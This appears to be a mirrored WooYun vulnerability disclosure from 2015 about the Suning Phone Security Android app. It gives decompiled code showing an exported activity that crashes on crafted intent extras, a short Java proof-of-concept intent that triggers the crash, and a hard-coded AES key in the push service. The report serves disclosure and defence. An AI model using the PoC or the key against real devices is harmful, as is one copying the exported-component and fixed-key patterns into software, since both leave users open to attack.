乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-23: 细节已通知厂商并且等待厂商处理中 2015-09-23: 厂商已经确认,细节仅向厂商公开 2015-09-26: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航) 2015-11-17: 细节向核心白帽子及相关领域专家公开 2015-11-27: 细节向普通白帽子公开 2015-12-07: 细节向实习白帽子公开 2015-12-22: 细节向公众公开
Android苏宁安全是一款免费的手机安全软件,集手机防盗、防垃圾短信,防骚扰电话功能于一身,为您带来全方位。。。。。。。。
由于组件com.suning.phonesecurity.firewall.NameEditorActivity暴露
protected void onCreate(Bundle arg4) { super.onCreate(arg4); this.n = this.getIntent(); if(this.n.getData() == null) { this.n.setData(ak.a); } this.m = this.n.getAction(); this.e = this.n.getStringExtra("blocktype"); if(this.e == null) { a.a("NameEditor", "No block type, exiting"); this.finish(); return; } this.o = this.n.getStringExtra(this.e); a.a("NameEditor", "mBlocktype:" + this.e); ActionBar v0 = this.getActionBar(); if(v0 != null) { v0.setDisplayOptions(12); } if(this.e.equals(NameEditorActivity.a[1])) { goto label_50; } if(this.e.equals(NameEditorActivity.a[3])) { goto label_50; } if(this.e.equals(NameEditorActivity.a[0])) { goto label_83; } if(!this.e.equals(NameEditorActivity.a[2])) { this.setContentView(2130968595); this.d = this.findViewById(2131427471); this.d.addTextChangedListener(this.q); if(!TextUtils.isEmpty(this.o)) { this.d.setText(this.o); } this.j = this.findViewById(2131427474); this.k = this.findViewById(2131427472); this.l = this.findViewById(2131427473); } else { label_83: // R.layout.activity_number_editor this.setContentView(2130968597); this.d = this.findViewById(2131427479); this.d.addTextChangedListener(this.q); this.d.addTextChangedListener(new PhoneNumberFormattingTextWatcher()); goto label_58; label_50: // R.layout.activity_patternnum_editor this.setContentView(2130968599); this.d = this.findViewById(2131427488); this.d.addTextChangedListener(this.q); } label_58: if(!"android.intent.action.INSERT".equals(this.m) && !"android.intent.action.EDIT".equals(this .m)) { a.a("NameEditor", "Unknown action, exiting"); this.finish(); return; } if(arg4 != null) { this.f = arg4.getString("origContent"); this.g = Boolean.valueOf(arg4.getBoolean("origPattern")); this.h = Boolean.valueOf(arg4.getBoolean("origCall")); this.i = Boolean.valueOf(arg4.getBoolean("origSms")); } }其中这三个转换 this.g = Boolean.valueOf(arg4.getBoolean("origPattern")); this.h = Boolean.valueOf(arg4.getBoolean("origCall")); this.i = Boolean.valueOf(arg4.getBoolean("origSms"));传入异常数据,即可产生拒绝服务
另外
package com.suning.cloud.push.pushservice.b; private b(Context arg7) { Iterator v2_1; super(); this.a = new ArrayList(); this.e = new HashMap(); this.d = arg7.getApplicationContext(); b.b(this.d); String v1 = this.d.getSharedPreferences(String.valueOf(this.d.getPackageName()) + ".push_sync", 1).getString("content", ""); if(!TextUtils.isEmpty(((CharSequence)v1))) { try { byte[] v1_2 = Base64.decode(v1.getBytes(), 0); SecretKeySpec v4 = new SecretKeySpec("9876543210123456".getBytes(), "AES"); Cipher v3 = Cipher.getInstance("AES"); v3.init(2, ((Key)v4)); String v2 = new String(v3.doFinal(v1_2)); if(h.f()) { Log.i(b.b, "init : " + v2); }固定秘钥是很危险的。
public static void NameEditorActivity_poc(Context context){ Intent intent=new Intent(); intent.setClassName("com.suning.phonesecurity", "com.suning.phonesecurity.firewall.NameEditorActivity"); intent.setAction("android.intent.action.INSERT"); intent.putExtra("blocktype", "whitelist"); intent.putExtra("whitelist", "xxoo"); intent.putExtra("origCall", "xxxx"); context.startActivity(intent); }
加trycatch就冲着 “感谢提交,移动客户端拒绝服务漏洞一律按照200元礼品卡计算”来的。
危害等级:低
漏洞Rank:1
确认时间:2015-09-23 15:14
感谢提交,请将安全漏洞提交至http://
暂无